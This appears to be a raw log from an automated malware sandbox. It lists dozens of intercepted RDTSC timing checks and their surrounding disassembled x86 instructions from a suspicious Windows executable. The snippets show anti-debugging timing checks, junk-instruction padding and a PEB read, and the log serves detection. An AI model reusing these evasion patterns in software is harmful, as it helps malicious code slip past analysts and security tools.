Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E45087 second address: E450A3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF1148823CCh 0x00000008 je 00007FF1148823D2h 0x0000000e jnp 00007FF1148823C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E45235 second address: E4523B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E458E2 second address: E45901 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FF1148823D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E45901 second address: E45911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF114F0297Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E45911 second address: E45917 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E45EC1 second address: E45EC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E466FD second address: E4670B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E469B4 second address: E469D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF114F0297Dh 0x0000000e jmp 00007FF114F0297Bh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E4A4FA second address: E4A4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E4A4FE second address: E4A504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E4F3EA second address: E4F3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E4F3EF second address: E4F429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF114F02976h 0x00000009 jnc 00007FF114F02976h 0x0000000f jmp 00007FF114F02980h 0x00000014 jns 00007FF114F02976h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF114F02980h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E573A0 second address: E573A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E573A9 second address: E573AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E573AD second address: E573B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E57978 second address: E579A1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF114F0297Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF114F02987h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E579A1 second address: E579A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E57E57 second address: E57E6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F0297Bh 0x00000007 jnc 00007FF114F02976h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E57E6C second address: E57E9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF1148823D5h 0x00000008 jmp 00007FF1148823D4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E58008 second address: E5800C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E5800C second address: E58010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E58010 second address: E58022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FF114F0297Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E58177 second address: E5817D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E589CD second address: E589DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jp 00007FF114F02976h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E589DB second address: E589E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E5911F second address: E5913D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FF114F0297Dh 0x0000000b jbe 00007FF114F02976h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E5913D second address: E59141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E59141 second address: E59145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E59145 second address: E5914B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E56F63 second address: E56F68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D982B9 second address: D982D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF1148823C6h 0x0000000a jmp 00007FF1148823CDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D982D0 second address: D982D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E610F4 second address: E6110E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E6110E second address: E6111A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FF114F02976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E6111A second address: E6111E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E643C3 second address: E643C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E76F39 second address: E76F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E76F3F second address: E76F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E7EDE3 second address: E7EDFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FF1148823E9h 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E7EC66 second address: E7EC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E7EC6E second address: E7EC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1148823D9h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF1148823CFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E8D4DD second address: E8D4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E8BF78 second address: E8BF93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF1148823D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E8BF93 second address: E8BFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FF114F02982h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF114F02982h 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E8BFC5 second address: E8BFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E8C5C0 second address: E8C5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E8C732 second address: E8C75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF1148823E4h 0x0000000a jmp 00007FF1148823CFh 0x0000000f jmp 00007FF1148823CFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E8C75A second address: E8C75F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E8D1F4 second address: E8D1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E8D1FB second address: E8D206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007FF114F02976h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: ED3520 second address: ED352D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: ED352D second address: ED3531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: ED3394 second address: ED33AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: ED33AB second address: ED33C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF114F02981h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: ED0171 second address: ED0177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: ED0177 second address: ED017B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: EE0557 second address: EE0577 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF1148823C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF1148823D4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: EE0577 second address: EE057E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA547F second address: FA54A2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FF1148823D4h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA58C6 second address: FA591C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02980h 0x00000007 jp 00007FF114F0299Ah 0x0000000d jmp 00007FF114F02988h 0x00000012 jmp 00007FF114F0297Ch 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007FF114F02984h 0x0000001f push esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA5E76 second address: FA5E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA5E7C second address: FA5E80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA5E80 second address: FA5E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA7742 second address: FA7746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA7746 second address: FA7754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA7754 second address: FA7770 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF114F02976h 0x00000009 jmp 00007FF114F02981h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA7770 second address: FA778B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1148823D1h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA778B second address: FA77A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF114F02980h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA77A9 second address: FA77B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF1148823C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA77B3 second address: FA77D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02987h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA77D3 second address: FA77E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF1148823CAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FA77E4 second address: FA77E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FAA5D8 second address: FAA5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FAA5DE second address: FAA63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edx, dword ptr [ebp+122D1851h] 0x0000000f push dword ptr [ebp+122D2341h] 0x00000015 mov edx, ebx 0x00000017 mov dx, 4E33h 0x0000001b call 00007FF114F02979h 0x00000020 push ebx 0x00000021 jmp 00007FF114F02987h 0x00000026 pop ebx 0x00000027 push eax 0x00000028 push eax 0x00000029 pushad 0x0000002a jng 00007FF114F02976h 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 pop eax 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FF114F0297Fh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FAA63D second address: FAA642 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FAA642 second address: FAA648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FAA648 second address: FAA686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jns 00007FF1148823DBh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF1148823D4h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FAA686 second address: FAA68C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FAA68C second address: FAA690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FABF90 second address: FABFA4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF114F0297Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FABFA4 second address: FABFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FABFA8 second address: FABFAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: FABAFA second address: FABB12 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF1148823CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jne 00007FF1148823C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0019 second address: 72C004F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF114F0297Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF114F0297Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C004F second address: 72C0064 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0064 second address: 72C0077 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov bx, 0B1Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0077 second address: 72C007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C007D second address: 72C0083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0083 second address: 72C0087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0087 second address: 72C008B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C008B second address: 72C00BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov si, bx 0x0000000e jmp 00007FF1148823D9h 0x00000013 popad 0x00000014 mov eax, dword ptr fs:[00000030h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C00BF second address: 72C00C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C00C3 second address: 72C00C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C00C9 second address: 72C00E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, FBh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub esp, 18h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bx, cx 0x00000013 mov bx, ax 0x00000016 popad 0x00000017 rdtsc
